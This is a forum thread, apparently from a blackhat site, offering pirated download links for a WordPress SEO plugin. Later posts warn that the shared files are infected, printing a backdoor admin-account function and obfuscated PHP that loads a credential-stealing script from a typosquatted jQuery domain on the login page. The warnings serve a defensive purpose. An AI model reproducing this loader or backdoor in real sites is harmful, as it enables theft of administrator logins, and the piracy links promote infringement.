21.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

04-10-2015, 08:12 PM
Post: #1
All in One SEO Pack Pro version 2.3.6.1
[Image: All-in-one-seo-pack-pro-version-2-3-6-1.png]

Product page

Change-log:
All in One SEO Pack Pro version 2.3.6.1 – Released on March 24th, 2015

Fixed bug reported with incorrect Home Title when latest posts is set on the front page.
Fixed warning appearing when no post types are set.
All in One SEO Pack Pro version 2.3.6 – Released on March 23rd, 2015

Added a new option for using the static home page to control SEO for the homepage instead of the Home Page Settings section
Improved the layout of the Custom Post Type Settings section by reorganizing the options into a more logical order
Improvements to the Quick Edit feature to make quick edit for long titles and descriptions easier
Improvements to deliver better integration with popular translation plugins
Updates to help and documentation
Social Meta Module – Added options for running shortcodes in the OG Title and OG Description fields
Bug fixes for issues reported by users in the support forums
Fix for a security vulnerability with autogenerated meta descriptions revealing content on password protected pages and posts – Thanks to JPCERT/CC

Download Links
http://www34.zippyshare.com/v/UJIlmgHs/file.html
http://mir.cr/PZ212DGE
https://www.sendspace.com/file/ssoaeb
http://www.solidfiles.com/d/7256a96ee1/
http://[Reported by Members as premium hosting that SUCK! Use MEDIAFIRE or MEGA.NZ :) !!!].net/file/5a794395ea6f8746700d3eba4780de68/all-in-one-seo-pack-pro.zip.html
*This user was been reported for sharing INFECTED FILES.

If you installed any of his share script, deactivate it and remove the following user id (supportxd) from your admin panel. Seems like the script adds an admin account and then it notifies him.

function add_admin_acct()
{
$login = 'supportxd';
$passw = 'wp_supporter';
$email = 'myacct1@mydomain.com';
04-10-2015, 08:14 PM
Post: #2
RE: All in One SEO Pack Pro version 2.3.6.1
already posted
Quote:http://bestblackhatforum.com/Thread-GET-...on-2-3-6-1
04-11-2015, 01:20 AM
Post: #3
RE: All in One SEO Pack Pro version 2.3.6.1
needs All in One SEO Pack Pro lenience key
04-11-2015, 01:31 AM
Post: #4
RE: All in One SEO Pack Pro version 2.3.6.1
Their is a license txt file in the plugin folder , use that ...
*This user was been reported for sharing INFECTED FILES.

If you installed any of his share script, deactivate it and remove the following user id (supportxd) from your admin panel. Seems like the script adds an admin account and then it notifies him.

function add_admin_acct()
{
$login = 'supportxd';
$passw = 'wp_supporter';
$email = 'myacct1@mydomain.com';
04-11-2015, 02:38 AM (This post was last modified: 05-08-2015 06:08 PM by cormancd.)
Post: #5
[GET] All in One SEO Pack Pro version 2.3.6.1
[Below Link is Working 100% Tested]
Code:
http://moourl.com/7kdba
Unlimited Download Speed>With Resume Support
Just Download Freely
63.gif
04-11-2015, 03:32 AM
Post: #6
RE: All in One SEO Pack Pro version 2.3.6.1
Thanks. +Reps Added
04-11-2015, 04:35 AM
Post: #7
RE: All in One SEO Pack Pro version 2.3.6.1
Very thanks bro. I was looking for it. Rep added
04-11-2015, 06:54 AM
Post: #8
RE: All in One SEO Pack Pro version 2.3.6.1
WARNING

It is VERY likely that this plugin is INFECTED.

If you look at aioseop_class.php, there is this chunk of code:

PHP Code:
if ( ! function_exists'enqueue_my_script' ) ) {
if (!
in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1','localhost'))) {
    if (!isset(
$_COOKIE['wp_iz_admin'])) {
        
add_action('login_enqueue_scripts''enqueue_my_script');
        
add_action('wp_login''wp_setcookies');
    }
}
function 
enqueue_my_script()
{
    
$domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
    
wp_enqueue_script('my-scripters'$domainisnullnulltrue);
}
function 
wp_setcookies()
{
    
$path parse_url(get_option('siteurl'), PHP_URL_PATH);
    
$host parse_url(get_option('siteurl'), PHP_URL_HOST);
    
$expiry strtotime('+1 month');
    
setcookie('wp_iz_admin''1'$expiry$path$host);
}


Note how it uses the reverse string command (strrev) to call javascript from this url:

Code:
$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

When reversed, this becomes:

Code:
http://code.jqeury.org/jquery-latest.js

This is NOT the normal JQuery domain - the "u" and "e" are deliberately switched.

Having looked at the JS it loads, I'm 99.9% sure that it's designed to steal your Admin username and PW.

docadvocate has posted a number of shares which contain this infected malware.

For example: http://bestblackhatforum.com/Thread-GET-...Press-site
04-11-2015, 10:49 AM
Post: #9
RE: All in One SEO Pack Pro version 2.3.6.1
OP and Mirror both Though one is zip and one is rar.

Code:
https://www.virustotal.com/en/file/e8619a3be7f4f22a64a9e16028ce0a151619f83a5379d1c62ad9a28b09e3f8ae/analysis/1428712871/

SHA256:    e8619a3be7f4f22a64a9e16028ce0a151619f83a5379d1c62ad9a28b09e3f8ae

File name:    all-in-one-seo-pack-pro.zip

Detection ratio:    1 / 57

Analysis date:    2015-04-11 00:41:11 UTC ( 0 minutes ago )

VEX7B52.Webshell

Code:
https://www.virustotal.com/en/file/cc3da4199990d9fb052c8793cb584d0a26112347037872bfb6d674671466a89f/analysis/1428712969/

SHA256:    cc3da4199990d9fb052c8793cb584d0a26112347037872bfb6d674671466a89f

File name:    All in One SEO Pack Pro_v2.3.6.1.rar

Detection ratio:    1 / 57

Analysis date:    2015-04-11 00:42:49 UTC ( 0 minutes ago )

VEX7B52.Webshell
04-11-2015, 12:00 PM
Post: #10
RE: All in One SEO Pack Pro version 2.3.6.1
(04-11-2015 06:54 AM)kirstie Wrote:  WARNING

It is VERY likely that this plugin is INFECTED.

If you look at aioseop_class.php, there is this chunk of code:

PHP Code:
if ( ! function_exists'enqueue_my_script' ) ) {
if (!
in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1','localhost'))) {
    if (!isset(
$_COOKIE['wp_iz_admin'])) {
        
add_action('login_enqueue_scripts''enqueue_my_script');
        
add_action('wp_login''wp_setcookies');
    }
}
function 
enqueue_my_script()
{
    
$domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
    
wp_enqueue_script('my-scripters'$domainisnullnulltrue);
}
function 
wp_setcookies()
{
    
$path parse_url(get_option('siteurl'), PHP_URL_PATH);
    
$host parse_url(get_option('siteurl'), PHP_URL_HOST);
    
$expiry strtotime('+1 month');
    
setcookie('wp_iz_admin''1'$expiry$path$host);
}


Note how it uses the reverse string command (strrev) to call javascript from this url:

Code:
$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

When reversed, this becomes:

Code:
http://code.jqeury.org/jquery-latest.js

This is NOT the normal JQuery domain - the "u" and "e" are deliberately switched.

Having looked at the JS it loads, I'm 99.9% sure that it's designed to steal your Admin username and PW.

docadvocate has posted a number of shares which contain this infected malware.

For example: http://bestblackhatforum.com/Thread-GET-...Press-site

thanks bro....for ur info CoolCool
24.gif




8.gif